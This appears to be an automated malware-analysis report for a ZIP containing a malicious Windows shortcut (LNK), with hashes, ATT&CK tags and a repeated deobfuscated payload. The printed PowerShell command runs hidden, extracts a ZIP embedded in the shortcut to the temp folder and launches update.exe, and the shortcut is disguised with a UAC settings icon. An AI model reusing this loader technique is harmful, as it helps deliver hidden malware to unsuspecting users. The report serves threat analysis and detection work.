Malicious
Malicious

bb952709ef032b6e89a58f96a025b1b73eb16a[...]ted.zip

ZIP Archive
|
MD5: ef4bb8f41f4262193eb2b599c573ba40
|
Size: 207.89 KB
|
application/zip

Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
ef4bb8f41f4262193eb2b599c573ba40
Sha1
baa0b861db90f186fdc481facdb2bdfc74b4f70a
Sha256
4d9d5dddb6c278fc4c4c24d73a01500194992b1d0254e9faec9ff4fa22cbe94f
Sha384
8a7b94ebfbf555a7c33db6479dcc04c8507939edfb71c8b984d7baad8d66a981a53ec98f880bb979054c37b45ddd2b2d
Sha512
66e04a675d3efeb44d5dbb550a229e981dd4605de87eb50e38d4a0e31ae8189e5cddbd07cb44f58b942e8a3390fc20414a40407d05c2cb76af77141b3c4bec1b
SSDeep
3072:xtYbURcUZ022l6z/MUfS3jGja6gqAPyOLRQX91pSmKMb+UBbDnExFG:x+URcE5fpjx5K9LG9/SHhCbDnExY
TLSH
8B14131A2485BE53DFE488F46D944A04CD8F2EA4FEB700D419AB7BB7F0CA457BD058A4
File Structure
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
filename.txt
Archive Entry
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin
Archive Entry
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
PowerShell
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
Value
LNK: Command Execution

cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe iconlocation: "%WINDIR%\System32\UserAccountControlSettings.exe" extradata: environmentvariabledatablock: headerblocksize: 788 788 blocksignature: -1610612735 targetansi: "%windir%\system32\cmd.exe" targetunicode: "%windir%\system32\cmd.exe"

bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip (207.89 KB)
File Structure
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
filename.txt
Archive Entry
bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin
Archive Entry
Zip Archive
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk
Archive Entry
LNK
Malicious
LOLBin
LOLBin:cmd.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Lnk Summary]
PowerShell
Powershell: Hidden Execution
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
Value Location
LNK: Command Execution

cmd.exe /c powershell -windowstyle hidden $obf_lnkpath = Get-ChildItem *.lnk ^| where-object {$_.length -eq 00209578} ^| Select-Object -ExpandProperty FullName;$obf_file = [system.io.file]::ReadAllBytes($obf_lnkpath);$obf_path = '%TEMP%\tmp'+(Get-Random)+'.zip';$obf_path = [Environment]::ExpandEnvironmentVariables($obf_path);$obf_dir = [System.IO.Path]::GetDirectoryName($obf_path);[System.IO.File]::WriteAllBytes($obf_path, $obf_file[003412..($obf_file.length)]);cd $obf_dir;Expand-Archive -Path $obf_path -DestinationPath . -EA SilentlyContinue -Force ^| Out-Null;Remove-Item -Path $obf_path -EA SilentlyContinue -Force ^| Out-Null;^& .\update.exe

Malicious

bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe

Malicious

bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > LNK CommandLine > [PowerShell Command]

Deobfuscated PowerShell

$obf_lnkpath = Get-ChildItem "*.lnk" "^" | Where-Object $_."length" -eq 209578 "^" | Select-Object -ExpandProperty "FullName" $obf_file = [File]::"ReadAllBytes"($obf_lnkpath) $obf_path = "%TEMP%\tmp" + (Get-Random) + ".zip" $obf_path = [Environment]::"ExpandEnvironmentVariables"($obf_path) $obf_dir = [Path]::"GetDirectoryName"($obf_path) [File]::"WriteAllBytes"($obf_path, $obf_file[3412 .. ($obf_file."length")]) Set-Location $obf_dir Expand-Archive -Path $obf_path -DestinationPath "." -EA "SilentlyContinue" -Force "^" | Out-Null Remove-Item -Path $obf_path -EA "SilentlyContinue" -Force "^" | Out-Null ^ & .\update.exe iconlocation: "%WINDIR%\System32\UserAccountControlSettings.exe" extradata: environmentvariabledatablock: headerblocksize: 788 788 blocksignature: -1610612735 targetansi: "%windir%\system32\cmd.exe" targetunicode: "%windir%\system32\cmd.exe"

Malicious

bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d_password_infected.zip > bb952709ef032b6e89a58f96a025b1b73eb16a2ca9ff2d4c4afeaedeff174c6d.bin > 37d7f927abcd4d1bf617e8279b8b8d7c8b14abec089e856faa6ffe36937c4e16.lnk > [Lnk Summary] > [PowerShell Command]

You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙